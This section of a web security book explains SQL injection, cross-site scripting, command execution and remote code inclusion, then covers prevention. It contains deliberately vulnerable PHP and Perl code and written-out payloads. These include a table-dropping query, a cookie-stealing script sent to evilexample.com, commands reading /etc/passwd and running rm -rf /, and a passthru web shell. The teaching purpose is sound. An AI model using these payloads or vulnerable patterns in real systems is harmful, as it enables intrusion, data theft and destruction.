Section 10.6. Injection Flaws

10.6. Injection Flaws

Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.

Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.

Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:

SQL injection: When an injection flaw causes user input to modify an SQL query in a way that was not intended by the application author
Cross-site scripting (XSS): When an attacker gains control of a user browser by injecting HTML and Java-Script code into the page
Operating system command execution: When an attacker executes shell commands on the server

Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in the section Section 10.9.

10.6.1. SQL Injection

SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.

10.6.1.1 A working example

SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.

Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.

CREATE DATABASE sql_injection_test;
   
USE sql_injection_test;
   
CREATE TABLE customers (
    customerid INTEGER NOT NULL,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL,
    PRIMARY KEY(customerid)
);
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 1, 'ivanr', 'secret' );
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 2, 'jelena', 'alsosecret' );
   
CREATE TABLE accounts (
    accountid INTEGER NOT NULL,
    customerid INTEGER NOT NULL,
    balance DECIMAL(9, 2) NOT NULL,
    PRIMARY KEY(accountid)
);
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 1, 1, 1000.00 );
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 2, 2, 2500.00 );

Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:

<?
   
$dbhost = "localhost";
$dbname = "sql_injection_test";
$dbuser = "root";
$dbpass = "";
   
// connect to the database engine
if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
   die("Could not connect: " . mysql_error( ));
}
   
// select the database
if (!mysql_select_db($dbname)) {
   die("Failed to select database $dbname:" . mysql_error( ));
}
   
// construct and execute query
$query = "SELECT username FROM customers WHERE customerid = "
    . $_REQUEST["customerid"];
   
$result = mysql_query($query);
if (!$result) {
   die("Failed to execute query [$query]: " . mysql_error( ));
}
   
// show the result
while ($row = mysql_fetch_assoc($result)) {
    echo "USERNAME = " . $row["username"] . "<br>";
}
   
// close the connection
mysql_close( );
   
?>

This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:

http://www.example.com/view_customer.php?customerid=1

The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:

http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2

If you specify the URL above, you will get two usernames displayed on the screen instead of a single one, which is what the programmer intended for the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (with the user-supplied data emphasized for clarity):

SELECT username FROM customers WHERE customerid = 1 OR customerid=2

This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of numbers, and numbers do not have a special meaning in SQL. Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:

$query = "SELECT customerid FROM customers WHERE username = '"
    . $_REQUEST["username"] . "'";

You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:

http://www.example.com/view_customer.php?username=ivanr

The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'

Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:

http://www.example.com/view_customer.php?username=ivanr'%20OR
%20username%3D'jelena'--%20

By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'
OR username='jelena'-- '

The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (') that appears in the input to \', in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.

Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach, is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.

10.6.1.2 Union

We have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set. Suppose the parameter customerid from the previous example is set as follows:

http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL
%20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2

the query becomes:

SELECT username FROM customers WHERE customerid = 1
UNION ALL SELECT balance FROM accounts WHERE customerid=2

The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username but it also retrieves an account balance from the accounts table.

10.6.1.3 Multiple statements in a query

Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:

We had to append our query fragment to an existing query, which limited what we could do with the query.
We were limited to the type of the query used by the programmer. A SELECT query could not turn into DELETE or DROP TABLE.

With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database).

When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:

http://www.example.com/view_customer.php?customerid=1;DROP%20
TABLE%20customers

After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers.

10.6.1.4 Special database features

Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it.

Databases have special features that make life difficult for those who need to protect them:

You can usually enumerate the tables in the database and the fields in a table. You can retrieve values of various database parameters, some of which may contain valuable information. The exact syntax depends on the database in place.
Microsoft SQL server ships with over 1,000 built-in stored procedures. Some do fancy stuff such as executing operating system code, writing query output into a file, or performing full database backup over the Internet (to the place of the attacker's choice, of course). Stored procedures are the first feature attackers will go for if they discover an SQL injection vulnerability in a Microsoft SQL server.
Many databases can read and write files, usually to perform data import and export. These features can be exploited to output the contents of the database, where it can be accessed by an attacker. (This MySQL feature was instrumental in compromising Apache Foundation's own web site, as described at http://www.dataloss.net/papers/how.defaced.apache.org.txt.)

10.6.1.5 SQL injection attack resources

We have only exposed the tip of the iceberg with our description of SQL injection flaws. Being the most popular flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.

"SQL Injection" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf)
"Advanced SQL Injection in SQL Server Applications" by Chris Anley (NGS) (http://www.nextgenss.com/papers/advanced_sql_injection.pdf)
"(more) Advanced SQL Injection" by Chris Anley (NGS) (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf)
"Hackproofing MySQL" by Chris Anley (NGS) (http://www.nextgenss.com/papers/HackproofingMySQL.pdf)
"Blind SQL Injection" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf)
"LDAP Injection" by Sacha Faust (SPI Dynamics) (http://www.spidynamics.com/whitepapers/LDAPinjection.pdf)
"Blind XPath Injection" by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/WhitePaper_Blind_XPath_Injection.pdf)

10.6.2. Cross-Site Scripting

Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.

This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.

Suppose a script contains an insecure PHP code fragment such as the following:

<? echo $_REQUEST["param"] ?>

It can be attacked with a URL similar to this one:

http://www.example.com/xss.php?param=<script>alert(document.location)</script>

The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.

Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker's registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.

XSS attacks can have some of the following consequences:

Deception: If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.
Collection of private user information: If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.
Providing access to restricted web sites: Sometimes a user's browser can go places the attacker's browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.
Execution of malicious requests on behalf of the user: This is an extension from the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It's a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user's IP address and the attacker becomes untraceable.
Client workstation takeover: Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.
Compromising of the client: If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own, the XSS attack only helps to achieve the compromise.
Session token stealing: The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.

In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:

<script>document.write('<img src=http://www.evilexample.com/'
+ document.cookie>)</script>

If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:

<script src=http://www.evilexample.com/script.js></script>

Though these examples show how a session token is stolen when it is stored in a cookie, nothing in cookies makes them inherently insecure. All session token transport mechanisms are equally vulnerable to session hijacking via XSS.

XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.

One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature.

XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.

10.6.2.1 XSS attack resources

"The Cross Site Scripting FAQ" by Robert Auger (http://www.cgisecurity.com/articles/xss-faq.txt)
"Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests" by CERT Coordination Center (http://www.cert.org/advisories/CA-2000-02.html)
"Understanding Malicious Content Mitigation for Web developers" by CERT Coordination Center (http://www.cert.org/tech_tips/malicious_code_mitigation.html)
"Cross-Site Scripting" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf)
"Cross-Site Tracing (XST)" by Jeremiah Grossman (WhiteHat Security) (http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf)
"Second-order Code Injection Attacks" by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf)
"Divide and Conquer, HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf)

10.6.3. Command Execution

Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.

Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:

$output = `ls -al /home/$username`;
echo $output;

This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The invocation:

http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd

It will display the contents of the passwd file on the server.

Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:

Execute any binary on the server (use your imagination)
Start a Telnet server and log into the server with privileges of the web server user
Download other binaries from public servers
Download and compile tool source code
Perform exploits to gain root access

The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:

# send email to the user
open(MAIL, "|/usr/lib/sendmail $email");
print MAIL "Thank you for contacting us.\n";
close MAIL;

This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line an attacker could terminate the email address using a semicolon, and execute any other command on the system.

http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/

10.6.4. Code Execution

Code execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include( ) statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include( ) statement is usually similar to this:

include($_REQUEST["module"] . "/index.php");

Here is an example URL with which it can be used:

http://www.example.com/index.php?module=news

In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.

As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include( ), PHP will download and execute a script from a remote server (!):

http://www.example.com/index.php?module=http://www.evilexample.com

Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:

include($TEMPLATES . "/template.php");

With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:

http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com

It's even worse if the PHP code only uses a request parameter to locate the file, like in the following example:

include($parameter);

When the register_globals option is enabled in a request that is of multipart/form-data type (the type of the request is determined by the attacker so he can choose to have the one that suits him best), PHP will store the uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!

Sometimes some other problems can lead to code execution on the server if someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the "SQL Injection" section for an example.)

A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:

<? passthru($cmd) ?>

Try it out for yourself and see how easy it can be.

10.6.5. Preventing Injection Attacks

Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere where characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, ", and '. Problems only arise if the programmer does not take steps to handle metacharacters properly.

To prevent injection attacks, a programmer needs to perform four steps:

Identify system components
Identify metacharacters for each component
Validate data on input of every component (e.g., to ensure a variable contains an email address, if it should)
Transform data on input of every component to neutralize metacharacters (e.g., to neutralize the ampersand character (&) that appears in user data and needs to be a part of an HTML page, it must be converted to &)

Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.

The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.